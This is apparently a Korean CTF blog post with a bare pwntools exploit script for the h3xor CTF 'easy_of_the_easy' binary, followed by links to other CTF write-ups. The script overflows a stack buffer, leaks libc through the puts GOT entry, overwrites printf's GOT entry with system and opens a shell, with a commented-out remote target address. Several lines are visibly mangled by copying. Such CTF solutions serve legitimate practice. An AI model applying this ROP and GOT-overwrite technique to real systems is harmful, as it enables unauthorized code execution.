hOwDayS 선린 10720

h3xor ctf easy 본문

CTF

h3xor ctf easy

hOwDayS 2018. 6. 17. 21:51
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
from pwn import *
 
= process("./easy_of_the_easy")
#p = remote("49.236.136.140",14000)
= ELF("./easy_of_the_easy")
pr = 0x080483f9
pppr = 0x080489e9
bss = 0x0804a040 +100
 
for i in range(0,200):
    p.recv()
    p.sendline("1")
    p.sendline("1")
    p.sendline("0")
 
 
p.sendline("3")
p.sendline("18899")
p.sendline("13")
 
p.sendline("0")
 
p.sendline("4")
p.sendline("1")
p.sendline("1")
 
p.recvuntil("Good Luck!")
payload  = "A" * (0x12 + 4
payload += p32(e.plt["puts"])
payload += p32(pr)
payload += p32(e.got["puts"])
 
payload += p32(e.plt["read"])
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(len("/bin/sh\x00"))
 
payload += p32(e.plt["read"])
payload += p32(pppr)
payload += p32(0)
payload += p32(e.got["printf"])
payload += p32(len("/bin/sh\x00"))
 
payload += p32(e.plt["printf"])
payload += "AAAA"
payload += p32(bss)
raw_input()
p.send(payload)
 
#print hexdump(p.recv())
 
libc_base = u32(p.recv(4)) - 0x5fca0
log.success("Libc_base : "+hex(libc_base))
p.send("/bin/sh\x00")
p.send(p32(libc_base + 0x3ada0))
 
p.interactive()
 
 
    
 
 
cs


'CTF' 카테고리의 다른 글

yisf 2018 예선 writeup  (0) 2018.08.16
h3xor ctf my_house  (1) 2018.06.17
선린인터넷고등학교 교내해킹방어대회 2018 vss  (0) 2018.06.11
선린인터넷고등학교 교내해킹방어대회 2018 cee  (0) 2018.06.11
선린인터넷고등학교 교내해킹방어대회 2018 SHELLCODING  (0) 2018.06.07
'CTF' Related Articles more
Comments